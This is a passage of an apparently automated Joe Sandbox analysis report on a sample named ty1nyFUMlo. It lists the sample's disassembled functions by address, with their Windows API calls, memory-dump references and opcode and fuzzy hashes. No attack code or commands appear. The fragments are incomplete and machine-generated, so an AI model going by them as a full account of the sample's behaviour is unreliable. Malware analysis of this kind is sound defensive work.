                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1539411459-0
                                                                                                                        • Opcode ID: 86e18fa264ac55a03956f98fa905e907e81f48d66c16808471dbced522369982
                                                                                                                        • Instruction ID: 90fb1ba7bc6ae5c7aaccbfeb9de6460cc5d76bdcd182896492d68d60d2a58c1b
                                                                                                                        • Opcode Fuzzy Hash: 86e18fa264ac55a03956f98fa905e907e81f48d66c16808471dbced522369982
                                                                                                                        • Instruction Fuzzy Hash: ABF03A36045659BADB125F94AC0DFDE3E59BF27310F448000FA11650E2CB795515EBA9
                                                                                                                        Function 005298B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSysColor.USER32(00000008), ref: 005298CC
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 005298D6
                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 005298E9
                                                                                                                        • GetStockObject.GDI32(00000005), ref: 005298F1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$ModeObjectStockText
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4037423528-0
                                                                                                                        • Opcode ID: fdf6603537d52c9d4adb0155221fe6a5cb8cc3c0d570d87573f395080bf49304
                                                                                                                        • Instruction ID: babda23092f530fcf023f160b2149b06ff6ffa12fd385980bdd04a0b603c7173
                                                                                                                        • Opcode Fuzzy Hash: fdf6603537d52c9d4adb0155221fe6a5cb8cc3c0d570d87573f395080bf49304
                                                                                                                        • Instruction Fuzzy Hash: 77E06D31644284ABDB215B74BC09BE83F60FB27336F048219F6FA581E1C7724684EB10
                                                                                                                        Function 0057162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00571634
                                                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,005711D9), ref: 0057163B
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005711D9), ref: 00571648
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,005711D9), ref: 0057164F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3974789173-0
                                                                                                                        • Opcode ID: 6d78daf8af01a9f0b2d155c7cc239e2065791bb06a459dc144e30e1677b3d84a
                                                                                                                        • Instruction ID: 9fd6a7abfb0923c10368a160921ec55014196553daf74aa5e51fb240e99b5b65
                                                                                                                        • Opcode Fuzzy Hash: 6d78daf8af01a9f0b2d155c7cc239e2065791bb06a459dc144e30e1677b3d84a
                                                                                                                        • Instruction Fuzzy Hash: 70E08635601211DBD7201FA5AD0DB4B3F7CBF66791F148808F245C9080D6344548E754
                                                                                                                        Function 0056D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDesktopWindow.USER32 ref: 0056D858
                                                                                                                        • GetDC.USER32(00000000), ref: 0056D862
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0056D882
                                                                                                                        • ReleaseDC.USER32(?), ref: 0056D8A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2889604237-0
                                                                                                                        • Opcode ID: fe3f31decb965d1eff72b2794d78ec19c2547cf145b65ae4249fd8c78f015923
                                                                                                                        • Instruction ID: ca8919bc23010366900ac9e3378c651b0e0ab707e0499b170370e9ed39fb7596
                                                                                                                        • Opcode Fuzzy Hash: fe3f31decb965d1eff72b2794d78ec19c2547cf145b65ae4249fd8c78f015923
                                                                                                                        • Instruction Fuzzy Hash: 69E01AB4800205DFCB419FA4D80C66DBFB1FB19310F108409E806E7350CB388945AF50
                                                                                                                        Function 0056D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDesktopWindow.USER32 ref: 0056D86C
                                                                                                                        • GetDC.USER32(00000000), ref: 0056D876
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0056D882
                                                                                                                        • ReleaseDC.USER32(?), ref: 0056D8A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2889604237-0
                                                                                                                        • Opcode ID: 587933b3dbc702fa7ea6e77ed2ba42330fd5dfb5924db8b132cafcaaa00c6018
                                                                                                                        • Instruction ID: 967b2f4171f1099f455d179a3d3f2215e27ba0317e127c4cc6dd779dd11b1383
                                                                                                                        • Opcode Fuzzy Hash: 587933b3dbc702fa7ea6e77ed2ba42330fd5dfb5924db8b132cafcaaa00c6018
                                                                                                                        • Instruction Fuzzy Hash: 78E012B4800204EFCB41AFA4D80C66EBFB1BB19310B108408E80AE7360CB38990AAF50
                                                                                                                        Function 00584D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625
                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00584ED4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Connection_wcslen
                                                                                                                        • String ID: *$LPT
                                                                                                                        • API String ID: 1725874428-3443410124
                                                                                                                        • Opcode ID: fd9859d703cb9dce0d4a2c527184bd683cb58c4f5888f4568e57e0fd7730efa5
                                                                                                                        • Instruction ID: ec4d1fe4e7100715e07138861d22498cf32366a0cc2e57413c7249f885553b84
                                                                                                                        • Opcode Fuzzy Hash: fd9859d703cb9dce0d4a2c527184bd683cb58c4f5888f4568e57e0fd7730efa5
                                                                                                                        • Instruction Fuzzy Hash: BB914A75A002059FDB14EF58C484AAABFB5BF48304F198099ED0AAB362D731ED85CF91
                                                                                                                        Function 0053E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 0053E30D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                        • String ID: pow
                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                        • Opcode ID: a521351e38fd914cd9748babc6443914a3f291837160b753a9f2b414ba0853ca
                                                                                                                        • Instruction ID: 3c105a0531dd9e4f1d239972786d0b5c7827b106ddec0575143a0e72a3a4b853
                                                                                                                        • Opcode Fuzzy Hash: a521351e38fd914cd9748babc6443914a3f291837160b753a9f2b414ba0853ca
                                                                                                                        • Instruction Fuzzy Hash: 5E515971E1C20A96CB157724C9473FA3FE8FB54744F208E98E095832E9EB309C95AA46
                                                                                                                        Function 00597771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(0056569E,00000000,?,005ACC08,?,00000000,00000000), ref: 005978DD
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                        • CharUpperBuffW.USER32(0056569E,00000000,?,005ACC08,00000000,?,00000000,00000000), ref: 0059783B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper$_wcslen
                                                                                                                        • String ID: <s]
                                                                                                                        • API String ID: 3544283678-3287859866
                                                                                                                        • Opcode ID: 19e8ceec31a0eaf7aec6d7496e4f8122198863ddef39dc8de6b698e883de127f
                                                                                                                        • Instruction ID: f78ab4f2a3c13ab3eb41a6b18f90cb29e4d93f20758be01d84cf36e5052db489
                                                                                                                        • Opcode Fuzzy Hash: 19e8ceec31a0eaf7aec6d7496e4f8122198863ddef39dc8de6b698e883de127f
                                                                                                                        • Instruction Fuzzy Hash: C9616B7292411AAADF04EBA4CC95DFDBB78FF58300F540926E542A3191EF306A85DBA0
                                                                                                                        Function 0052E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: #
                                                                                                                        • API String ID: 0-1885708031
                                                                                                                        • Opcode ID: ebd096cdad5b00089a014a309f1720a9cd61dbfbeafd85f61edb94e74676f74a
                                                                                                                        • Instruction ID: 66adfff15f52614cec2f1f134505b049b2068563e8ecacdaee075e01aa8943b8
                                                                                                                        • Opcode Fuzzy Hash: ebd096cdad5b00089a014a309f1720a9cd61dbfbeafd85f61edb94e74676f74a
                                                                                                                        • Instruction Fuzzy Hash: A1513339502296DFDF15DF28D086AFA7FA8FF66310F644055E8929B2C0D6349D82CBA0
                                                                                                                        Function 0052F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000), ref: 0052F2A2
                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0052F2BB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                        • Opcode ID: c74dde67e1f6d21e205f5e19fd96fb59d69fa193dacbb454621c85b518957ae6
                                                                                                                        • Instruction ID: c7a2995c9ab9ec5f6a5ad5f1cdfd9c427da7dc9de0f0fd6f0e4bc561255378ce
                                                                                                                        • Opcode Fuzzy Hash: c74dde67e1f6d21e205f5e19fd96fb59d69fa193dacbb454621c85b518957ae6
                                                                                                                        • Instruction Fuzzy Hash: 95514971408B499BE320AF14DC8ABABBBF8FFD9300F81485DF1D941195EB318569CB66
                                                                                                                        Function 00572999 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 005729EB
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00572A8D
                                                                                                                          • Part of subcall function 00572C75: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00572CE0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: @U=u
                                                                                                                        • API String ID: 3850602802-2594219639
                                                                                                                        • Opcode ID: 89b5d1cb788e8e3fcde0eb255877522e9bf222e5f6346890409146c1026357dc
                                                                                                                        • Instruction ID: 9761ff7e9162e5abb79856990daf07c9d7d5ebb9f6a39a43a85da2295f43b6ed
                                                                                                                        • Opcode Fuzzy Hash: 89b5d1cb788e8e3fcde0eb255877522e9bf222e5f6346890409146c1026357dc
                                                                                                                        • Instruction Fuzzy Hash: DA41A470A00209ABEF25DF54D859BEE7FB9FF84710F044429F909A3291DB709E84DB92
                                                                                                                        Function 00595745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 005957E0
                                                                                                                        • _wcslen.LIBCMT ref: 005957EC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper_wcslen
                                                                                                                        • String ID: CALLARGARRAY
                                                                                                                        • API String ID: 157775604-1150593374
                                                                                                                        • Opcode ID: 4c7374515d6a575ef49dd4067d61b4ca6bbcf62f38d25066da1e83756f1d7315
                                                                                                                        • Instruction ID: 1c137534ec4c76d0c473b9da2367f8f55f118cdcbbcc352f0b521fcfa437f5d1
                                                                                                                        • Opcode Fuzzy Hash: 4c7374515d6a575ef49dd4067d61b4ca6bbcf62f38d25066da1e83756f1d7315
                                                                                                                        • Instruction Fuzzy Hash: 42418071A0010A9FCF15DFA9D8899EEBFF5FF99320F244069E505A7291E7309D91CB90
                                                                                                                        Function 0058D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 0058D130
                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0058D13A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CrackInternet_wcslen
                                                                                                                        • String ID: |
                                                                                                                        • API String ID: 596671847-2343686810
                                                                                                                        • Opcode ID: 8dc1b1c69ce2af2d77bf59b796b38f88908ad9efa361b3b3ab525f61b27950a0
                                                                                                                        • Instruction ID: 20de1884158e0cb95b0cdf2d8ee3d4ff1b41bc96ce37ac12595cdfae6ab8a7f9
                                                                                                                        • Opcode Fuzzy Hash: 8dc1b1c69ce2af2d77bf59b796b38f88908ad9efa361b3b3ab525f61b27950a0
                                                                                                                        • Instruction Fuzzy Hash: 91311A71D0020AABDF15EFA4CC89AEFBFB9FF44300F000119F815A6165DB31AA56DB60
                                                                                                                        Function 005A356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 005A3621
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 005A365C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                        • Opcode ID: 122e22337bc0781ba20589693aa950e43beab676233fb604c540f61636c4bd61
                                                                                                                        • Instruction ID: ec25a2110fa329503b0883681e4de8e28bc733ad666cfcda874b9030258fb835
                                                                                                                        • Opcode Fuzzy Hash: 122e22337bc0781ba20589693aa950e43beab676233fb604c540f61636c4bd61
                                                                                                                        • Instruction Fuzzy Hash: 2231AD71500204AEEB109F68DC84EFF7BA9FF89724F008619F8A597280DA31AD81D760
                                                                                                                        Function 005A4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 005A461F
                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005A4634
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: '
                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                        • Opcode ID: b4c3178dca700e86665d0cc00e29ceb6bbc411a83cd23056dbacc146c5d51745
                                                                                                                        • Instruction ID: cf6a83b4df17a8db4cdfa2242298cf86384d68b0ab00f160ebbea7432901c601
                                                                                                                        • Opcode Fuzzy Hash: b4c3178dca700e86665d0cc00e29ceb6bbc411a83cd23056dbacc146c5d51745
                                                                                                                        • Instruction Fuzzy Hash: 11310774A0120A9FDB14CFA9C990BEE7BB5FF8A300F14446AE905AB351D7B0A941DF90
                                                                                                                        Function 00513923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 005533A2
                                                                                                                          • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00513A04
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
